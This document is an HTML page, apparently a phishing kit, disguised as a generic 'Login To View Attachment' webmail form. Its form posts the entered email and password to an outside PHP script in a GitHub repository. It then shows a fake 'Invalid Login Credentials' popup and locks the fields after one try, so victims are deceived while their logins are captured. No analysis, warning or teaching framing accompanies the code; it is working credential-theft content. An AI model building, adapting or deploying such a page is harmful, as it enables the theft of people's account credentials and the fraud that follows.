<html>
<head>
<title>Javascript Login Form Validation</title>
<!-- jQuery cdn link -->
    <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>	
<!-- Include CSS File Here -->
<style>
body {
    background-image: url('https://media-exp1.licdn.com/dms/image/C5612AQHNGS4AGRM2jA/article-inline_image-shrink_1500_2232/0/1520247503570?e=1661990400&v=beta&t=PAWhTWbAoShOkmiqqv6ymROvrPTbfOBEKIQpwAfT9RA');
    background-position: center;
    background-repeat: no-repeat;
    background-size: auto;
   }

/* Below line is used for online Google font */
@import url(http://fonts.googleapis.com/css?family=Raleway);
h2{
background-color: #808080;
color: #FCFCFC;
padding: 30px 35px;
margin: -10px -50px 40;
text-align: center;
border-radius: 5px 5px 0 0;
}
hr{
margin: 10px -50px;
border: 0;
border-top: 1px solid #ccc;
margin-bottom: 40px;
}
b{
background-color: #FFFFF0;
padding: 20px 111px;
position: absolute;
text-align: center;
color: #4f4f4f;
}
#privacy-policy {
color: #0C7C84;
}
#forgot-password {
      position: absolute;
      right: 50px;
      color: #0C7C84;
      text-decoration: none;
	  font-weight: bold;
      background-color: transparent;
      box-sizing: border-box;
    }
div.container{
width: 520px;
height: 610px;
margin:35px auto;
font-family: 'Raleway', sans-serif;
}
div.main{
width: 400px;
height: 400px;
padding: 10px 50px 25px;
border: 2px solid gray;
border-radius: 10px;
font-family: raleway;
align-items: center;
justify-content: center;
position: fixed;
margin-top:150px;
background: #FFFFF0;
}
input[type=text],input[type=password]{
width: 100%;
height: 40px;
padding: 5px;
margin-bottom: 25px;
margin-top: 5px;
border: 2px solid #ccc;
color: #4f4f4f;
font-size: 16px;
border-radius: 5px;
}
label{
color: #464646;
text-shadow: 0 1px 0 #fff;
font-size: 14px;
font-weight: bold;
}
center{
font-size:32px;
}
.note{
color:red;
}
.valid{
color:green;
}
.back{
text-decoration: none;
border: 1px solid rgb(0, 143, 255);
background-color: rgb(0, 214, 255);
padding: 3px 20px;
border-radius: 2px;
color: black;
}
input[type=submit]{
font-size: 16px;
background: linear-gradient(#ffbc00 5%, #ffdd7f 100%);
border: 1px solid #e5a900;
color: #4E4D4B;
font-weight: bold;
cursor: pointer;
width: 100%;
border-radius: 5px;
padding: 10px 0;
outline:none;
}
input[type=submit]:hover{
background: linear-gradient(#ffdd7f 5%, #ffbc00 100%);
}

        .content {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-52.5%, -550%);
            width: 502px;
            height: 55px;
            text-align: center;
            background-color: pink;
            box-sizing: border-box;
            padding: 10px;
			padding-align: top;
            z-index: 100;
            display: none;
			border-radius: 8px 8px;
            /*to hide popup initially*/
        }
          
        .close-btn {
            position: absolute;
            right: 10px;
            top: 10px;
            background-color: red;
            color: white;
            border-radius: 20%;
            padding: 4px;
        }
		
		.close-btn:hover,
        .close-btn:focus {
            color: #000;
            text-decoration: none;
            cursor: pointer;
        }
		h3{
		color: #4f4f4f;;
		}
</style>
<!-- Include JS File Here -->
<script>
// Function to show and hide the popup
        function togglePopup() {
            $(".content").toggle();	
            event.preventdefault();
        }
		
$(document).ready(function(){
   $("span").click(function(){
     $("#form_id").submit();
	 
   });
});
</script>
<script>
function attempt(){
var attempt = 1; // Variable to count number of attempts.
attempt --;// Decrementing by one.
// Disabling fields after 1 attempts.
if( attempt == 0){
document.getElementById("email").disabled = true;
document.getElementById("password").disabled = true;
document.getElementById("sbmt").disabled = true;
document.getElementById("forgot-password").disabled = true;
document.getElementById("privacy-policy").disabled = true;
return false;
}
}
</script>
</head>
<body>
<div class="container">
<div class="main">
<h2>Login To View Attachment</h2>
<form id="form_id" name="spark" action="https://github.com/busybrain2233/webmailrepo/blob/master/spark.php" method="post">
<label>Email address</label>
<input type="text" name="email" id="email"/>
<label>Password</label>
<a class="forgot-password" id="forgot-password" href="modal.html" tabindex="4">Forgot password?</a>
<input type="password" name="password" id="password"/>
<input type="submit" value="Login" id="sbmt" onclick="togglePopup()"/>
</form>
<b class="copyright">Copyright &copy; 2022, L.L.C.
<br/><a id="privacy-policy" href="modal.html" target="_blank">Privacy Policy</a></b>
</div>
</div>
<!-- div containing the popup -->
    <div class="content">
        <div onclick="togglePopup()">
            <span id="btn" type="submit" class="close-btn" onclick="document.forms['catch'].submit();">&times;</span>
        </div>
        <h3>Invalid Login Credentials.</h3>
    </div>
</body>
</html>
